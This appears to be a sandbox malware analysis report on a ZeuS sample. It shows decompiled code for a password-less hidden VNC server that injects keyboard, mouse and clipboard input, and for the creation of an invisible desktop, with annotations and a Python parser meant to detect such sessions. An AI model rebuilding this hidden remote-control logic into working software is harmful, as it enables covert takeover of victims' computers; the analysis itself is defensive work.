  • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00406B19
  • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00406B38
  • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00406B44
  • CreateProcessAsUserW.ADVAPI32(?,00000000,0040C0CB,00000000,00000000,00000000,0040C0CB,0040C0CB,00000000,?,?,?,00000000,00000044), ref: 00406BB5
  • CloseHandle.KERNEL32(?), ref: 00406BC8
  • CloseHandle.KERNEL32(?), ref: 00406BCD
  • FreeLibrary.KERNEL32(?), ref: 00406BE4
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
  • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
  • API String ID: 3080530829-1103369309
  • Opcode ID: 5c836810cce7dad74537ac23530ded3788378dbdf45f32593cb4d488227eac4c
  • Instruction ID: e7d6e076b10a1750bce5883c803ae7bd2bca4c020f0bbb16be5e2901b3362391
  • Opcode Fuzzy Hash: 5c836810cce7dad74537ac23530ded3788378dbdf45f32593cb4d488227eac4c
  • Instruction Fuzzy Hash: F021FAB2D0021DABDF109FE5CC85DAEBBBCEB08344F14447AE511F6190D639AE54CB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
			E0041B567(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E00408210(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E00408199(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E00405D49(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00405865( &_v52, "RFB ", 0);
				_t206 = ((E00405865( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					// RFB 3.3 security type, sent as a big-endian u32 below: 1 = None (no password);
					// the _v20 == 0 branch is RFB's "connection failed" and appears to hand off to E0041B501
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					if(E00408210( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E0041B501(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E00408199(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E0041B340( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E00405D23(_v36);
					// ServerInit: width and height as big-endian u16, the 16-byte pixel format (its red/green/blue
					// max fields byte-swapped by the rol instructions), then the u32 name length; the 0x18 = 24 bytes
					// go out first, followed by the name of length _t507
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E00405222( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E00408210( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E00408210(_t247, _a4, _v36, _t507) == 0) {
						return E0041B4CE(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E00405299( &_v380,  &_v380, 0, 0xff);
						E00405299( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								// Wait for client data with a 0x12c = 300 ms timeout; -1 with WSAETIMEDOUT means no data,
								// in which case the queued framebuffer update requests are serviced instead
								_t274 = E00408496(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								// ws2_32 ordinal 111 is WSAGetLastError (see the APIs list); 0x274c is WSAETIMEDOUT,
								// any other socket error tears the session down at L104
								if(_t274 != 0x274c) {
									L104:
									E0041B4CE(_t505);
									return E004051E6(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E0041AFD8(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E00405299(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E00405171(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								// Client-to-server message loop: read the 1-byte message type, then dispatch on it.
								// 0x1b7740 (1,800,000) accompanies every recv-wrapper call, consistent with a 30-minute timeout in ms
								_t257 = E00408199(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									// Type 0, SetPixelFormat: skip 3 padding bytes, read the 16-byte PIXEL_FORMAT; only
									// 8, 16 or 32 bits-per-pixel with the true-colour flag set is accepted
									_t262 = E004081E1(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E00408199(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E00405222(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								// The byte counts of the remaining branches match RFB client messages 2 to 6:
								// SetEncodings (1 pad + u16 count + count*4; encoding 5 = Hextile is noted at +0x4c),
								// FramebufferUpdateRequest (9), KeyEvent (7), PointerEvent (5), ClientCutText (3 pad + u32 len + text)
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E004081E1(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E00408199(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E004051E6( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E00405171((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E00408199(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E00408199(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E00405222(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E00405171(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E00408199(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E00408199(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									// PointerEvent: 0x17 is SM_SWAPBUTTON; the VNC button mask becomes mouse_event flags
									// (0x8000 ABSOLUTE, 1 MOVE, 2/4 left, 8/0x10 right, 0x20/0x40 middle, 0x800 wheel with
									// +120/-120), with left and right exchanged when the user has swapped the buttons
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E00405222( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								// Type 6, ClientCutText: skip 3 padding bytes, read the u32 text length, allocate len+1,
								// read the text and hand it to the callback at +0x1c
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E00408199(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E00408199(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E004051B6(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E004051E6(0);
									goto L104;
								}
								_t366 = E00408199(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E004051E6(_t389);
							}
							_t300 = E004051B6(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}
Instruction addresses for the listing above (the per-line side column, detached by extraction): 0x0041b572 .. 0x0041bd52

APIs
    • Part of subcall function 00408210: send.WS2_32(?,?,?,00000000), ref: 0040821E
  • WSAGetLastError.WS2_32(00000031,00000020,00000010,?,00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B7C7
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B7E2
  • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041B874
  • GetSystemMetrics.USER32 ref: 0041B98E
    • Part of subcall function 00408199: recv.WS2_32(?,?,?,00000000), ref: 004081BD
  • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041BD1A
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
  • String ID: $RFB $RFB 003.003$x
  • API String ID: 3911805420-914445781
  • Opcode ID: 1ae3abe96f2207b256dd30277cd02d9b4436a7a453b47732979bc9d9a17f0eb3
  • Instruction ID: 7f454416614020b9c9e1b356235ea1ef375a19cff9eb2dfc098aaf1db8739341
  • Opcode Fuzzy Hash: 1ae3abe96f2207b256dd30277cd02d9b4436a7a453b47732979bc9d9a17f0eb3
  • Instruction Fuzzy Hash: E932DF71A00219ABDF28DBA4D8417FE7BB5EF44344F04406EE951AB2C2DB7C9985CBD8
Uniqueness

Uniqueness Score: -1.00%
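The handler above is a VNC (RFB 3.3) server: it sends the ProtocolVersion string, answers with security type None, sends ServerInit and then consumes client messages with exactly the byte counts the RFB specification prescribes. The Python below is an added example (not code from the sample or from Joe Sandbox) that decodes a client-to-server stream with the same layouts, applies the same version and pixel-format acceptance tests, and reproduces the PointerEvent-to-mouse_event mapping computed in the GetSystemMetrics branch. The message names are the RFB names; SAMPLE is a constructed stream, not captured traffic. A decoder like this is what one would run over a suspicious connection to recognise a session driven by this handler.

```python
"""RFB 3.3 client-to-server decoding with the byte counts the handler above reads."""
import struct

HEXTILE = 5               # the one encoding the handler looks for (stored at +0x4c)
VALID_BPP = {8, 16, 32}   # SetPixelFormat bits-per-pixel values it accepts
# Win32 MOUSEEVENTF_* flags assembled by the PointerEvent branch
MOVE, LEFTDOWN, LEFTUP, RIGHTDOWN, RIGHTUP = 0x1, 0x2, 0x4, 0x8, 0x10
MIDDLEDOWN, MIDDLEUP, WHEEL, ABSOLUTE = 0x20, 0x40, 0x800, 0x8000


def check_version(line):
    """Version test: a 12-byte 'RFB xxx.yyy\\n' with 3.3 <= version <= 6.3 (unsigned compare)."""
    if len(line) != 12 or not line.startswith(b"RFB "):
        raise ValueError("not an RFB version line")
    major, minor = int(line[4:7]), int(line[8:11])
    if not 0 <= (major << 8 | minor) - 0x303 <= 0x300:
        raise ValueError(f"version {major}.{minor} rejected")
    return major, minor


def _take(buf, off, n):
    """Return buf[off:off+n] and the new offset, or fail on a truncated message."""
    if off + n > len(buf):
        raise ValueError("truncated message")
    return buf[off:off + n], off + n


def parse_client_messages(buf):
    """Decode a client-to-server stream into dicts; an unknown type ends the session."""
    msgs, off = [], 0
    while off < len(buf):
        mtype, off = buf[off], off + 1
        if mtype == 0:                                   # SetPixelFormat: 3 pad + 16-byte format
            body, off = _take(buf, off, 19)
            bpp, true_colour = body[3], body[6]
            if bpp not in VALID_BPP or not true_colour:
                raise ValueError("pixel format rejected")
            msgs.append({"type": "SetPixelFormat", "bpp": bpp})
        elif mtype == 2:                                 # SetEncodings: 1 pad + u16 count + count*i32
            hdr, off = _take(buf, off, 3)
            (count,) = struct.unpack(">H", hdr[1:])
            body, off = _take(buf, off, 4 * count)
            encs = list(struct.unpack(f">{count}i", body))
            msgs.append({"type": "SetEncodings", "encodings": encs, "hextile": HEXTILE in encs})
        elif mtype == 3:                                 # FramebufferUpdateRequest: 9 bytes
            body, off = _take(buf, off, 9)
            inc, x, y, w, h = struct.unpack(">BHHHH", body)
            msgs.append({"type": "FramebufferUpdateRequest", "incremental": bool(inc),
                         "rect": (x, y, w, h)})
        elif mtype == 4:                                 # KeyEvent: down u8, 2 pad, key u32
            body, off = _take(buf, off, 7)
            down, key = struct.unpack(">BxxI", body)
            msgs.append({"type": "KeyEvent", "down": bool(down), "key": key})
        elif mtype == 5:                                 # PointerEvent: mask u8, x u16, y u16
            body, off = _take(buf, off, 5)
            mask, x, y = struct.unpack(">BHH", body)
            msgs.append({"type": "PointerEvent", "buttons": mask, "pos": (x, y)})
        elif mtype == 6:                                 # ClientCutText: 3 pad + u32 len + text
            hdr, off = _take(buf, off, 7)
            (length,) = struct.unpack(">I", hdr[3:])
            text, off = _take(buf, off, length)
            msgs.append({"type": "ClientCutText", "text": text.decode("latin-1")})
        else:
            raise ValueError(f"unknown client message type {mtype}")
    return msgs


def pointer_to_mouse_event(prev, mask, moved, swap_buttons):
    """Reproduce the PointerEvent branch: VNC button mask -> (mouse_event flags, wheel delta).
    Left/right are exchanged when SM_SWAPBUTTON is set; mask bits 3/4 become wheel +120/-120."""
    flags, delta = ABSOLUTE | (MOVE if moved else 0), 0
    left_down, left_up = (RIGHTDOWN, RIGHTUP) if swap_buttons else (LEFTDOWN, LEFTUP)
    right_down, right_up = (LEFTDOWN, LEFTUP) if swap_buttons else (RIGHTDOWN, RIGHTUP)
    changed = prev ^ mask
    if changed & 1:
        flags |= left_down if mask & 1 else left_up
    if changed & 4:
        flags |= right_down if mask & 4 else right_up
    if changed & 2:
        flags |= MIDDLEDOWN if mask & 2 else MIDDLEUP
    if mask & 8:
        flags, delta = flags | WHEEL, 120
    if mask & 16:
        flags, delta = flags | WHEEL, -120
    return flags, delta


# Constructed client stream: SetPixelFormat (32 bpp true colour), SetEncodings (Raw, Hextile),
# one full-screen update request, an 'a' key press, a left-button press and a clipboard paste.
SAMPLE = (
    b"\x00" + b"\x00" * 3 + bytes([32, 24, 0, 1]) + struct.pack(">HHHBBB", 255, 255, 255, 16, 8, 0) + b"\x00" * 3
    + b"\x02\x00" + struct.pack(">H", 2) + struct.pack(">ii", 0, 5)
    + b"\x03" + struct.pack(">BHHHH", 0, 0, 0, 1024, 768)
    + b"\x04" + struct.pack(">BxxI", 1, 0x61)
    + b"\x05" + struct.pack(">BHH", 1, 100, 200)
    + b"\x06" + b"\x00" * 3 + struct.pack(">I", 5) + b"hello"
)
```

The parser fails on the same inputs the handler rejects (a version outside 3.3..6.3, a pixel format that is not 8/16/32 bpp true colour, an unknown message type), so a stream it accepts is one this server would have accepted; on a proxy or in a pcap replay that is the signal worth alerting on.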

C-Code - Quality: 100%
			E0040B9A6(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				// Hidden desktop setup: E0040F34A(0xcc, buf) appears to fill buf from the sample's string table
				// (it is used the same way for ids 0xcd, 0, 1 and 2); the resulting window station name is
				// opened, or created below, with GENERIC_ALL (0x10000000)
				E0040F34A(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E0040B97E(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E0040F34A(0xcd, _t37);
					}
					// Open (or create, in the else branch) the desktop by name, then switch the calling thread to it
					// if it is not already there; windows on this desktop are never shown to the interactive user
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0040B939(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E0040B97E(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}
Instruction addresses for the listing above (the per-line side column, detached by extraction): 0x0040b9a6 .. 0x0040ba9d

APIs
  • OpenWindowStationW.USER32 ref: 0040B9CB
  • CreateWindowStationW.USER32 ref: 0040B9DE
  • GetProcessWindowStation.USER32 ref: 0040B9EF
  • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040BA2A
  • CreateDesktopW.USER32 ref: 0040BA3E
  • GetCurrentThreadId.KERNEL32 ref: 0040BA4A
  • GetThreadDesktop.USER32(00000000), ref: 0040BA51
  • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040BA63
  • CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040BA75
  • CloseWindowStation.USER32(?,?), ref: 0040BA90
Memory Dump Source
